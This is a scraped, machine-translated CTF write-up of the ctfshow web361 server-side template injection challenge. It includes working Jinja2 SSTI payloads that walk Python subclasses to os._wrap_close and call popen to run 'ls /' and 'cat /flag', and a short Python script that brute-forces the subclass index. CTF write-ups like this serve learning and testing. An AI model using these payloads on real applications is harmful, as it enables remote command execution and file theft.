当前位置:网站首页>ctfshow-web361(SSTI)
ctfshow-web361(SSTI)
2022-04-23 18:33:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
notice Hello, Guess the input parameter is name
?name={
{[].__class__.__base__.__subclasses__()}}
Then it should be to write scripts and run programs to find the required functions ( Use someone else's , I can't write yet python Script )
Here use os._wrap_close class
import requests
from tqdm import tqdm
for i in tqdm(range(233)):
url = 'http://5e2ef65c-fcb3-4ca5-9502-acab1d21ebc8.challenge.ctf.show/?name={
{%22%22.__class__.__bases__[0].__subclasses__()['+str(i)+']}}'
r = requests.get(url=url).text
if('os._wrap_close' in r):
print(i)
Output 132
Then start using
use __init__.__globals__ lookup popen( Just find it , No need for location )
__globals__:
This attribute is a function specific attribute , Record the value of the global variable of the current file , If a file calls os、sys Such as the library , But we can only access the file, a function or an object , So we can use it __globals__ Property to access global variables
therefore __init__.__globals__ It should be to call global variables
?name={
{[].__class__.__base__.__subclasses__()[132].__init__.__globals__}}
This should be to call... In the global variable popen
os.popen() Method is used to open a pipe from a command .( I don't quite understand the details , You can use commands )
popen Methods by p.read() Get terminal output
?name={
{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}}
With the help of open() function , And in readable mode ( Include r、r+、rb、rb+) Open file , You can call read() Function byte by byte ( Or character by character ) Read the contents of the file . ( Probably popen With the help of open() function , Not very clear )
?name={
{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}}
?name={
{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
Probably understand , Know why , But it won't work
版权声明
本文为[m0_ sixty-two million ninety-four thousand eight hundred and fo]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829008002.html
边栏推荐
- kettle庖丁解牛第17篇之文本文件输出
- WIN1 remote "this may be due to credssp encryption Oracle correction" solution
- Using transmittablethreadlocal to realize parameter cross thread transmission
- How to restore MySQL database after win10 system is reinstalled (mysql-8.0.26-winx64. Zip)
- Daily CISSP certification common mistakes (April 14, 2022)
- JD-FreeFuck 京東薅羊毛控制面板 後臺命令執行漏洞
- Win1远程出现“这可能是由于credssp加密oracle修正”解决办法
- Daily network security certification test questions (April 18, 2022)
- Nodejs installation
- 使用 bitnami/postgresql-repmgr 镜像快速设置 PostgreSQL HA
猜你喜欢
使用 bitnami/postgresql-repmgr 镜像快速设置 PostgreSQL HA
C medium? This form of
Use of regular expressions in QT
Win1远程出现“这可能是由于credssp加密oracle修正”解决办法
玻璃体中的硫酸软骨素
ctfshow-web362(SSTI)
Custom prompt box MessageBox in QT
Dynamically add default fusing rules to feign client based on sentinel + Nacos
QT add external font ttf
【ACM】70. 爬楼梯
随机推荐
Daily CISSP certification common mistakes (April 15, 2022)
Install the yapiupload plug-in in idea and upload the API interface to the Yapi document
Refcell in rust
Introduction to QT programming
iptables初探
QT add external font ttf
Robocode tutorial 5 - enemy class
CANopen STM32 transplantation
深度学习经典网络解析目标检测篇(一):R-CNN
Ctfshow - web362 (ssti)
Daily CISSP certification common mistakes (April 13, 2022)
【ACM】509. Fibonacci number (DP Trilogy)
Cutting permission of logrotate file
昇腾 AI 开发者创享日全国巡回首站在西安成功举行
QT notes on qmap container freeing memory
os_authent_prefix
NVIDIA Jetson: GStreamer and openmax (GST OMX) plug-ins
Error reported when running tensorboard: valueerror: duplicate plugins for name projector, solution
Daily network security certification test questions (April 13, 2022)
Halo open source project learning (VII): caching mechanism